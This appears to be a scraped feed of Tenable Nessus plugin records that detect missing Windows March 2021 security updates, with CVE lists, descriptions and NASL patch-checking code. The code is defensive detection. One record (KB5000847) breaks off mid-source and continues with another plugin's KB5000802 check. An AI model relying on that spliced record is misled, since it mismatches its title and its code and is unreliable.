"https://www.tenable.com/plugins/nessus/147217", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147217);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26882\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000844\");\n script_xref(name:\"MSKB\", value:\"5000856\");\n script_xref(name:\"MSFT\", value:\"MS21-5000844\");\n script_xref(name:\"MSFT\", value:\"MS21-5000856\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000856: Windows Server 2008 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000856\nor cumulative update 5000844. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26893, CVE-2021-26894,\n CVE-2021-26895, CVE-2021-26897)\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26882, CVE-2021-26898, CVE-2021-26899,\n CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26896,\n CVE-2021-27063)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000844-monthly-rollup-d90d0eb1-6319-4a7e-97f6-68fbd306fd5a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?177a5bc6\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000856-security-only-update-7a0eb0b9-7f1c-44e5-ba3f-4f6e5e92b33e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22792d68\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5000856 or Cumulative Update KB5000844.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", 
value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000844',\n '5000856'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000844, 5000856])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n 
hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:52", "description": "The remote Windows host is missing security update 5000807.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26866, CVE-2021-26868, CVE-2021-26871, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26885, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2021-26861, CVE-2021-26881)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000807: Windows 10 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26866", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27077"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000807.NASL", "href": "https://www.tenable.com/plugins/nessus/147230", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147230);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000807\");\n script_xref(name:\"MSFT\", value:\"MS21-5000807\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", 
value:\"2021-A-0134-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000807: Windows 10 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000807.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26866,\n CVE-2021-26868, CVE-2021-26871, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26882, CVE-2021-26885, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2021-26861,\n CVE-2021-26881)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000807-os-build-10240-18874-09c57376-4108-4d34-bc89-3d4baec37ade\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dcda9069\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000807.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26901\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000807'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000807])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:29", "description": "The remote Windows host is missing security update 5000851 or cumulative update 5000841. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26881, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2021-24107, CVE-2021-26869)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26896, CVE-2021-27063)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000851: Windows 7 and Windows Server 2008 R2 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26869", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000841.NASL", "href": "https://www.tenable.com/plugins/nessus/147231", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147231);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26869\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000841\");\n script_xref(name:\"MSKB\", value:\"5000851\");\n script_xref(name:\"MSFT\", value:\"MS21-5000841\");\n script_xref(name:\"MSFT\", value:\"MS21-5000851\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000851: Windows 7 and Windows Server 2008 R2 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000851\nor cumulative update 5000841. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26881, CVE-2021-26893,\n CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An information disclosure vulnerability. 
An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26882, CVE-2021-26898, CVE-2021-26899,\n CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26896,\n CVE-2021-27063)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000851-security-only-update-9e198918-a6d6-46d3-8cfb-bd2b1e2ecb99\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cce9359\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000841-monthly-rollup-3a2cced1-f436-40c3-a8a1-645f86759088\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c5851d4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5000851 or Cumulative Update KB5000841.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000841',\n '5000851'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000841, 5000851])\n)\n{\n 
replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:06:19", "description": "The remote Windows host is missing security update 5000840 or cumulative update 5000847. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26881, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26868, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000840: Windows Server 2012 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26886", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000847.NASL", "href": "https://www.tenable.com/plugins/nessus/147221", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000802-os-builds-19041-867-and-19042-867-63552d64-fe44-4132-8813-ef56d3626e14\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8437e591\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000802.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27070\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : 
Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000802'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000802])\n|| \n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000802])\n\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:29", "description": "The remote Windows host is missing security update 5000808.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
